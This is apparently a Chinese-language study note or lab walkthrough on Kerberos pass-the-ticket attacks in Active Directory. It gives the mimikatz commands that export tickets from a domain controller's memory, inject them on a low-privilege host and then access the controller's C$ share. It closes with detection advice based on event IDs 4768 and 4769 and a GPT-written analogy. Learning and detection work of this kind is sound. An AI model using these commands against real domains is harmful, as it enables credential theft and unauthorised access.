階段一 竊取DC主機高權tickets

登入administrator帳號，用mimikatz匯出krbtgt來模擬，用klist確認有krbtgt

klist

把tickets從memory竊取匯出，1.kirbi複製到一般權限的攻擊主機

privilege::debug
sekurlsa::tickets /export

階段二 於一般權限主機利用高權tickets

使用一般使用者帳號登入
用mimikatz匯入

mimikatz.exe "kerberos::ptt 1.kirbi" exit

從klist確認匯入成功

klist

使用偷來的tickets，不需驗證執行連線行為

dir \\dc01\c$

EventID

正常情況下，每個 TGS（Ticket Granting Service）事件應該有一個對應的 TGT（Ticket Granting Ticket）事件，TargetUserName&IP，因此查找獨立的TGS即是異常

TGT 4768

TGS 4769

https://en.wikipedia.org/wiki/Kerberos_(protocol)

讓GPT幫我們生成一個情境來了解

情境描述

想像你是一位員工，進入公司的流程如下：

1. 取得 TGT（識別吊牌）：
   當你到達公司的大門時，有一位守衛負責核實你的身份。如果你的身份信息正確，守衛會發給你一個識別吊牌（TGT）。這個吊牌證明了你的身份，並且在有效期內可以用來請求進一步的訪問。
2. 取得 TGS（機房鑰匙）：
   當你想要進入某個特定的部門，比如機房，你需要向該部門的管理員請求一把機房的鑰匙（TGS）。在這種情況下，你需要出示你的識別吊牌（TGT），以證明你的身份，然後管理員會根據你的身份授予你這把鑰匙。

出現的情況

假設系統記錄到你試圖請求機房鑰匙（TGS），但是查找時卻找不到對應的識別吊牌（TGT）事件。

這種情況的含義

• 潛在問題：
  • 你可能沒有在大門守衛那裡正確獲得識別吊牌（TGT），或者你的吊牌已經過期。
  • 這可能意味著你在沒有有效的身份證明的情況下試圖進入受限制的區域，這是一個潛在的安全風險。
  • 也有可能是守衛沒有正確記錄你的身份，導致系統中沒有你的 TGT 記錄。

總結

當出現 TGS 事件而沒有對應的 TGT 事件時，這通常表明某種異常情況，可能需要進一步調查，以確保安全系統的

REF

AD Security - [Day8] 一起來學 AD 安全吧！：AD 驗證協定 Kerberos (2
https://ithelp.ithome.com.tw/articles/10297185

渗透测试-27：横向移动
https://www.cnblogs.com/toki-plus/p/16286576.html

Kerberos Protocol Explained (Animated)
https://narekkay.fr/posts/kerberos-protocol-explained-animated/

Domain Escalation: Unconstrained Delegation
https://www.hackingarticles.in/domain-escalation-unconstrained-delegation/

Kerberos Pass-The-Ticket Basics

Domain Admin: Bloodhound, Mimikatz, Pass-The-Hash & Golden ticket.